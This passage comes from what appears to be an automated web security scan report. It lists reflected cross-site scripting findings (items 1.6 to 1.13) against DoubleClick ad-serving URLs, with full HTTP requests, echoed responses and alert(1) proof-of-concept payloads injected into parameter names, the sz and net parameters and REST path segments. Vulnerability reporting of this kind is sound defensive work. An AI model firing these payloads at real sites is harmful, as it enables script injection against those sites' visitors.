User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABKtKkgA==A-aWrFdouoM2KET|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCwYc=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: u="aABnA6AkA==AI89bBrQ==AAABLzpCwYY=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: f="aAB1tgxqQ==AK1302352544AB1AAABLzpCwYU=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: s="aACeHA9_w==AE9479AN1294103956000AAABLzpCwYU=AE8438AN1275963655000AAABLzpCwYU=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: a=c369295169464782579;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Set-Cookie: j=c369295169464782579;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-RvuhyLCM5c93;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Set-Cookie: p=1-RvuhyLCM5c93;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352544134;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Content-Length: 2847

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352544133;click=h
...[SNIP]...
' border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=12387&aa=9530,84152,12352,361230,824,10261,WrFdouoM2KET,http%3A%2F%2Frocketfuelinc.com,492,1249,38387,1279,6613&pa=ppre35252550824788e8f'><script>alert(1)</script>2f874ec50da&id=&ra=3525441350.3508423759469188'>
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/fnc/root/stocksearch [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/fnc/root/stocksearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b07"style%3d"x%3aexpression(alert(1))"b41c0a38777 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85b07"style="x:expression(alert(1))"b41c0a38777 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?&85b07"style%3d"x%3aexpression(alert(1))"b41c0a38777=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 574

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/y;235228619;0-0;1;22676449;21-88/31;40472641/40490428/1;;~okv=;pos=stocksearch;fnc=ad;sz=88x31;;85b07"style="x:expression(alert(1))"b41c0a38777=1;~aopt=2/1/8b/0;~sscs=%3fhttp://ad.doubleclick.net/clk;235657212;58880944;s">
...[SNIP]...

1.7. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa07e"-alert(1)-"aeaa2972497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&aa07e"-alert(1)-"aeaa2972497=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:36:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7011

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&aa07e"-alert(1)-"aeaa2972497=1http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167480");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "neve
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 115ba'-alert(1)-'12c0aaa9aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&115ba'-alert(1)-'12c0aaa9aad=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:36:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7011

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&115ba'-alert(1)-'12c0aaa9aad=1http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167480\">
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4c81"-alert(1)-"532b4a5b9ac was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXa4c81"-alert(1)-"532b4a5b9ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:35:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6969

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
00/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXa4c81"-alert(1)-"532b4a5b9achttp://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167480");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdf1b'-alert(1)-'b9757c6ddd4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXcdf1b'-alert(1)-'b9757c6ddd4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:35:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6969

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
00/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXcdf1b'-alert(1)-'b9757c6ddd4http://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167480\">
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010 [net parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2addd'%3balert(1)//0280304bd4f was submitted in the net parameter. This input was echoed as 2addd';alert(1)//0280304bd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;net=2addd'%3balert(1)//0280304bd4f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 400
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:51 GMT
Expires: Mon, 11 Apr 2011 16:21:51 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/p;239769129;2-0;0;46850814;255-0/0;41621127/41638914/1;;~okv=;net=2addd';alert(1)//0280304bd4f;~aopt=2/1/e4/0;~sscs=%3fhttps://mastercard.choicepay.com/mcfed/mastercard6.jsp">
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/detail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/detail

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99899'-alert(1)-'228a68fc46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.hearsttv.wptz/detail99899'-alert(1)-'228a68fc46;kw=containerlinkswelike;pos=1;sz=253x300;ord=4697446210775524? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:31:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1289

document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n    <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n        ');

docu
...[SNIP]...
<scr'+'ipt type="text/javascript" src="http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail99899'-alert(1)-'228a68fc46;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6865167?">
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/index

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26096'-alert(1)-'66ba3d012db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

